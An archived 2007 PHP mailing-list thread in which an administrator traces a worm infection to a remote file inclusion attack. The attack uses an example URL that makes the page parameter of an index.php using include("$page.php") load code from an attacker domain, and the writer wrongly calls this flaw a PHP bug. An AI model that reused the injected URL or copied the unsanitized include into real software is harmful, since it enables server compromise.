RE: [PHP-WIN] Re: Question on virus/worms

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Turn off all error reporting (in php.ini) so that the error isn't pushed
to the screen. 

-----Original Message-----
From: Seak, Teng-Fong [mailto:seak.tf@xxxxxxxxxxxx] 
Sent: Friday, March 02, 2007 12:16 PM
To: php-windows@xxxxxxxxxxxxx; php-general@xxxxxxxxxxxxx
Subject: [PHP-WIN] Re: Question on virus/worms

Robert Cummings wrote:
> Did you bother to google any of them? I just punched PHP/BackDoor.gen 
> into Google and got a wealth of information.
    Yes, of course!  But what I can see there aren't far from useless
(cf what I write below).

Stut wrote:
> Seak, Teng-Fong wrote:
>> PHP/Chaploit
> http://vil.nai.com/vil/content/v_129568.htm
>
> [snipped]
    I know these already.  The server is using McAfee.  So I'm quite
familiar with VIL of McAfee.  But informations given by these pages
aren't enough to let me know what to do and how those virus/worms got to
get inside.
>>     Do they mean anything to anyone of you?  Do you know how they've 
>> got inside the computer?  Is there anything to do to prevent that?  
>> Are they known PHP virus/worms to PHP community?
> Most likely means of them getting onto your machine is poorly written 
> scripts, over-reliance on scripts downloaded from the web and poor 
> server security.
>
> Hope that helps.
    No, not really :-(

    But after I've spent some time reading the log files, I've finally
found out how the hackers managed to achieve worm infiltration.

    Actually, they're using an URL like this:
http://my-domain.com/index.php?page=http://hacker-domain.com/some-worm-f
ile.txt?

    And the some-worm-file.txt file contains some PHP code, while my
index.php contains this instruction:
include("$page.php");

    This is enough to make infiltration possible!  IMO, this instruction
is supposed to be used like this, isn't it?  So this is obviously a PHP
security loophole and I don't see how the "poorly written scripts" can
help anything unless a totally rewrite!  And there's no "poor server
security" that I can see.

    I've installed PHP5 and the problem seems fixed.  However, PHP
writes out where the problem occurs!  Indeed, the hacker could read a
line like this:
Warning: include() [function.include]: URL file-access is disabled in
the server configuration in C:\Inetpub\wwwroot\index.php on line X

    I don't want them (the hackers) to be able to read this either. 
That gives too much information about my server's file system.  How can
I stop that?

    By the way, I know there're still a lot of servers out there still
using PHP4.  Is this vulnerability a known bug?  At least, I'm not aware
of that before!

    Regards,

    Seak




----------
* Zoner PhotoStudio 8 - Your Photos perfect, shared, organised!
www.zoner.com/zps
  You can download your free version.

--
PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit:
http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[Index of Archives]     [PHP Home]     [Apache Users]     [PHP on Windows]     [Kernel Newbies]     [PHP Install]     [PHP Classes]     [Pear]     [Postgresql]     [Postgresql PHP]     [PHP on Windows]     [PHP Database Programming]     [PHP SOAP]

  Powered by Linux